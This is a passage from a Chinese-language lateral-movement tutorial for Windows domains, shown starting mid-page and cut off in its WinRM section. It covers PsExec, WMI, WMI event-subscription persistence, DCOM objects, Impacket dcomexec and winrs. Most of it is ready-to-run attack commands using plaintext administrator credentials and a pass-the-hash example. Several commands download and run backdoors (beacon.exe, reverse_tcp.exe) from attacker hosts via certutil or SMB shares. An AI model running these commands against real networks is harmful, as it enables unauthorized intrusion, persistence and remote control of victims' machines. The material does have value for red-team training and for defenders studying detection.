<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PsExec.exe \\192.168.3.21 -u administrator -p Admin12345 -s cmd</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p><code>Impacket</code>套件和<code>Metasploit</code>都内置了PsExec的脚本或模块。</p>
<h2><span id="wmi">WMI</span></h2><p>WMI 是一套用于监控和<strong>管理</strong> Windows 操作系统的服务。了解操作系统的状态。<br>可以管理本地和远程，远程传输WMI数据有2个协议：DCOM、WinRM<br>WMI的2种利用方式：</p>
<ol>
<li>WMI的类方法进行远程命令执行</li>
<li>部署WMI事件订阅</li>
</ol>
<p>一、命令执行<br>1、自带wmic<br>内部：(单执行)</p>
<div class="code-container" code-lang="Pgsql"><div class="codebox"><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wmic /node:<span class="number">192.168</span><span class="number">.3</span><span class="number">.21</span> /<span class="keyword">user</span>:administrator /<span class="keyword">password</span>:Admin12345 process <span class="keyword">call</span> <span class="keyword">create</span> &quot;cmd.exe /c certutil -urlcache -split -f http://192.168.3.22/5555.exe c:/5555.exe&quot;</span><br><span class="line"> </span><br><span class="line">wmic /node:<span class="number">192.168</span><span class="number">.3</span><span class="number">.32</span> /<span class="keyword">user</span>:administrator /<span class="keyword">password</span>:<span class="keyword">admin</span>!@#<span class="number">45</span> process <span class="keyword">call</span> <span class="keyword">create</span> &quot;cmd.exe /c c:/beacon.exe&quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>2、wmiexec.vbs<br>内置：(交互式)<br>上传wmiexec.vbs</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>3、wmiexec<br>外部：(交互式&amp;单执行)</p>
<div class="code-container" code-lang="Llvm"><div class="codebox"><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">wmiexec ./administrator:Admin<span class="number">12345</span><span class="title">@192</span>.<span class="number">168.3</span>.<span class="number">21</span> <span class="string">&quot;whoami&quot;</span></span><br><span class="line">wmiexec god/administrator:Admin<span class="number">12345</span><span class="title">@192</span>.<span class="number">168.3</span>.<span class="number">21</span> <span class="string">&quot;whoami&quot;</span></span><br><span class="line"> </span><br><span class="line">wmiexec -hashes :<span class="number">518</span>b<span class="number">98</span>ad<span class="number">4178</span>a<span class="number">53695</span>dc<span class="number">997</span>aa<span class="number">02</span>d<span class="number">455</span><span class="keyword">c</span> ./administrator<span class="title">@192</span>.<span class="number">168.3</span>.<span class="number">21</span> <span class="string">&quot;whoami&quot;</span></span><br><span class="line"> </span><br><span class="line">下载后门：</span><br><span class="line">wmiexec ./administrator:Admin<span class="number">12345</span><span class="title">@192</span>.<span class="number">168.3</span>.<span class="number">21</span> <span class="string">&quot;cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe&quot;</span></span><br><span class="line"> </span><br><span class="line">执行后门：</span><br><span class="line">wmiexec ./administrator:Admin<span class="number">12345</span><span class="title">@192</span>.<span class="number">168.3</span>.<span class="number">21</span> <span class="string">&quot;cmd.exe /c c:/beacon.exe&quot;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>二、WMI事件订阅<br>当创建进程时，通过WMI事件订阅来执行预先设置的脚本。</p>
<ul>
<li>事件过滤器（Event Filter）：触发事件的具体条件</li>
<li>事件消费者（Event Consumer）：触发后的一系列操作</li>
</ul>
<p>在部署事件订阅时，需要分别构建Filter和Consumer两部分，并绑定在一起。<br>利用工具<code>Sharp-WMIEvent</code>：<a target="_blank" rel="noopener" href="https://github.com/wh0amitz/Sharp-WMIEvent">https://github.com/wh0amitz/Sharp-WMIEvent</a></p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 先搭建一个SMB共享服务器</span></span><br><span class="line"><span class="comment"># 然后执行下面命令，在主机上部署一个随机命名的永久事件订阅，每60s执行一次</span></span><br><span class="line">Sharp<span class="literal">-WMIEvent</span> <span class="literal">-Trigger</span> Interval <span class="literal">-IntervalPeriod</span> <span class="number">60</span> <span class="literal">-ComputerName</span> <span class="number">192.168</span>.<span class="number">220.130</span> <span class="literal">-Domain</span> hack.com <span class="literal">-Username</span> Administrator <span class="literal">-Password</span> Admin12345 <span class="literal">-Command</span> <span class="string">&quot;cmd.exe /c \\192.168.220.132\evilsmb\shell.exe&quot;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<h2><span id="dcom">DCOM</span></h2><p>COM 组件对象模型<br>DCOM 分布式组件对象模型<br>COM（Component Object Model，组件对象模型）是微软的一套软件组成的二进制接口标准，使得跨编程语言的进程间通信、动态对象创建成为可能。COM指定了一个对象模型和编程要求，使COM对象能够与其他对象交互。这些对象可以在单个进程中，也可以在其它进程中，甚至可以在远程计算机中。在Windows中，每个COM对象都由唯一的128位的二进制标识符标识，即GUID。<br>DCOM（Distracted Component Model，分布式组件对象模型）是基于COM的一系列概念和程序接口，支持不同机器上的组件间通信。利用DCOM，客户端程序对象可以请求来自网络中另一台计算机上的服务器程序对象。<br>部分DCOM组件公开的接口中可能包含不安全的方法。执行以下命令，可以列出计算机上所有的DCOM程序组件<br> Get-CimInstance Win32_DCOMApplication<br>目前常利用的DCOM组件有：MMC20.Application、ShellWindows、Excel.Application、ShellBrowserWindow等。<br>使用DCOM在远程主机上面执行命令，需要具有以下条件：</p>
<ul>
<li>具有管理员权限的PowerShell</li>
<li>可能需要关闭目标系统的防火墙。</li>
<li>在远程主机上执行命令时，必须使用域管的administrator账户或者目标主机具有管理员权限的账户<h3><span id="mmc20application">MMC20.Application</span></h3>MMC20.Application对象的Document.ActiveView下存在一个ExecuteShellCommand方法，可以用来启动子进程并运行执行的程序或系统命令。<div class="code-container" code-lang="Elixir"><div class="codebox"><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过progID与DCOM进行远程交互，并创建MMC20.Application对象的示例</span></span><br><span class="line"> <span class="variable">$com</span> = [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromProgID</span>(<span class="string">&quot;MMC20.Application&quot;</span>,<span class="string">&quot;192.168.30.100&quot;</span>))</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 调用ExecuteShellCommand方法启动进程，运行攻击载荷</span></span><br><span class="line"> <span class="variable">$com</span>.<span class="title class_">Document</span>.<span class="title class_">ActiveView</span>.<span class="title class_">ExecuteShellCommand</span>(<span class="string">&#x27;cmd.exe&#x27;</span>,<span class="variable">$null</span>,<span class="string">&quot;/c \\192.168.207.152\mysmb\reverse_tcp.exe&quot;</span>, <span class="string">&quot;Minimized&quot;</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 合并一句话</span></span><br><span class="line"> [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromProgID</span>(<span class="string">&quot;MMC20.Application&quot;</span>,<span class="string">&quot;192.168.30.100&quot;</span>)).<span class="title class_">Document</span>.<span class="title class_">ActiveView</span>.<span class="title class_">ExecuteShellCommand</span>(<span class="string">&#x27;cmd.exe&#x27;</span>,<span class="variable">$null</span>,<span class="string">&quot;/c \\192.168.207.152\mysmb\reverse_tcp.exe&quot;</span>, <span class="string">&quot;Minimized&quot;</span>)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3><span id="shellwindows">ShellWindows</span></h3>ShellWindows组件提供了Document.Application.ShellExecute方法，适用于Windows7及以上的系统。<div class="code-container" code-lang="Elixir"><div class="codebox"><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建ShellWindows对象的实例:</span></span><br><span class="line"> <span class="variable">$com</span>=[<span class="title class_">Activator</span>]::<span class="title class_">CreateInstance</span>([<span class="title class_">Type</span>]::<span class="title class_">GetTypeFromCLSID</span>(<span class="string">&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;</span>,<span class="string">&quot;192.168.30</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"> .138&quot;</span>))</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 然后执行如下命令，我们就可以调用该对象的&quot;ShellExecute&quot;方法在远程主机上启动进程:</span></span><br><span class="line"> <span class="variable">$com</span>.item().<span class="title class_">Document</span>.<span class="title class_">Application</span>.<span class="title class_">ShellExecute</span>(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>,<span class="string">&quot;c:\windows\system32&quot;</span>,<span class="variable">$null</span>,<span class="number">0</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 完整的命令:</span></span><br><span class="line"> [<span class="title class_">Activator</span>]::<span class="title class_">CreateInstance</span>([<span class="title class_">Type</span>]::<span class="title class_">GetTypeFromCLSID</span>(<span class="string">&#x27;9BA05972-F6A8-11CF-A442-00A0C90A8F39&#x27;</span>,<span class="string">&quot;192.168.52.138&quot;</span>)).item().<span class="title class_">Document</span>.<span class="title class_">Application</span>.<span class="title class_">ShellExecute</span>(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>,<span class="string">&quot;c:\windows\system32&quot;</span>,<span class="variable">$null</span>,<span class="number">0</span>)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3><span id="excelapplication">Excel.Application</span></h3><div class="code-container" code-lang="Elixir"><div class="codebox"><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"> <span class="variable">$com</span> = [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromprogID</span>(<span class="string">&quot;Excel.Application&quot;</span>,<span class="string">&quot;192.168.52.138&quot;</span>))</span><br><span class="line"> <span class="variable">$com</span>.<span class="title class_">DisplayAlerts</span> = <span class="variable">$false</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 然后执行如下命令，我们就可以调用该对象的&quot;DDEInitiate&quot;方法在远程主机上启动进程:</span></span><br><span class="line"> <span class="variable">$com</span>.<span class="title class_">DDEInitiate</span>(<span class="string">&quot;cmd.exe&quot;</span>,<span class="string">&quot;/c C:\shell.exe&quot;</span>)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3><span id="shellbrowserwindow">ShellBrowserWindow</span></h3>使用条件：适用于Windows 10和Windows Server 2012 R2等版本的系统。<div class="code-container" code-lang="Elixir"><div class="codebox"><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 通过PowerShell与DCOM进行远程交互，创建Excel.Application对象的实例:</span></span><br><span class="line"> <span class="variable">$com</span> = [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromCLSID</span>(<span class="string">&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;</span>,<span class="string">&quot;192.168.52.138&quot;</span>))</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 然后执行如下命令，我们就可以调用该对象的&quot;shellExecute&quot;方法在远程主机上启动进程:</span></span><br><span class="line"> <span class="variable">$com</span>.<span class="title class_">Document</span>.<span class="title class_">Application</span>.shellExecute(<span class="string">&quot;C:\shell.exe&quot;</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># 完整的命令:</span></span><br><span class="line"> [activator]::<span class="title class_">CreateInstance</span>([type]::<span class="title class_">GetTypeFromCLSID</span>(<span class="string">&quot;C08AFD90-F2A1-11D1-8455-00A0C91F3880&quot;</span>,<span class="string">&quot;192.168.52.138&quot;</span>)).<span class="title class_">Document</span>.<span class="title class_">Application</span>.shellExecute(<span class="string">&quot;C:\shell.exe&quot;</span>)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h3><span id="impacket里的dcomexecpy脚本">Impacket里的dcomexec.py脚本</span></h3>Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell，但使用的是DCOM，目前支持MMC20.Application，ShellWindows和ShellBrowserWindow对象。<br>命令格式如下：<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./dcomexec.py domain/username:password@ip</span><br><span class="line"> ./dcomexec.py domain/username:password@ip &lt;<span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div></li>
</ul>
<h2><span id="winrm">WinRM</span></h2><p>执行命令<br>交互式会话<br>WinRM是通过执行WS-Management协议（用于远程软件和硬件管理的Web服务协议）来实现远程管理的，允许处于一个共同网络内的Windows计算机彼此之间互相访问和交换信息，对应的端口是5985。在一台计算机启用WinRM服务后，防火墙会自动放行其相关通信端口，在另一台计算机便能通过WinRM对其进行远程管理了。<br>只有在Windows Server 2008以上版本的服务器中，WinRm服务才会自动启动。<br>在利用WinRM进行横向移动时，需要拥有远程主机的管理员凭据信息。</p>
<h3><span id="通过winrm执行远程命令">通过WinRM执行远程命令</span></h3><p>Windows远程管理提供了两个工具：<br>① Winrs，允许远程执行命令的命令行工具，利用了WS-Manage协议<br>② Winrm（Winrm.cmd)，内置系统管理命令行工具，允许管理员配置本机的WinRM服务。<br>在默认情况下，无法通过WinRM连接到目标系统。可能出现错误：Winrs error：WinRM客户端无法处理该请求。可以将默认身份验证与IP地址结合使用：<br>① 传输为HTTPS或目标位于TrustedHosts列表中，并且提供显式凭据<br>② 使用Winrm.cmd配置TrustedHosts。<br>执行以下命令，将目标地址添加到TrustedHosts中：</p>
<div class="code-container" code-lang="Dsconfig"><div class="codebox"><figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">winrm</span> <span class="string">set</span> <span class="string">winrm</span>/<span class="string">config</span>/<span class="string">client</span> @&#123;<span class="string">TrustedHosts</span>=<span class="string">&quot;192.168.30.100&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">set-Item</span> <span class="string">WSMan:localhost\</span><span class="string">client</span>\<span class="string">trustedhosts</span> -<span class="string">value</span> *    <span class="comment"># 通过powershell，信任所有主机</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p><strong>Winrs</strong><br>winrs是Windows上远程管理提供的客户端程序，允许通过提供的用户凭据，在运行WinRM的服务器上执行命令。要求通信双方都安装了WinRM服务。</p>
<div class="code-container" code-lang="Awk"><div class="codebox"><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 执行系统命令</span></span><br><span class="line">winrs -r:http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">30.100</span>:<span class="number">5985</span> -u:Administrator -p:Admin2012 <span class="string">&quot;whoami&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取远程交互式命令行</span></span><br><span class="line">winrs -r:http:<span class="regexp">//</span><span class="number">192.168</span>.<span class="number">30.100</span>:<span class="number">5985</span> -u:Administrator -p:Admin2012 <span class="string">&quot;cmd&quot;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p><strong>Winrm.cmd</strong><br>winrm.cmd允许WMI对象通过WinRm传输进行远程交互，在本地或远程计算机上枚举WMI对象实例或调用WMI类方法。比如可以通过调用Win32_Process类的Create方法来创建远程实例。</p>
<div class="code-container" code-lang="Smali"><div class="codebox"><figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">winrm<span class="built_in"> invoke </span>create wmicimv2/win32_process -SkipCAcheck -skipCNcheck @&#123;commandline=<span class="string">&quot;notepad.exe&quot;</span>&#125; -r:http://192.168.30.100:5985 -u:Administrator -p:Admin2012</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 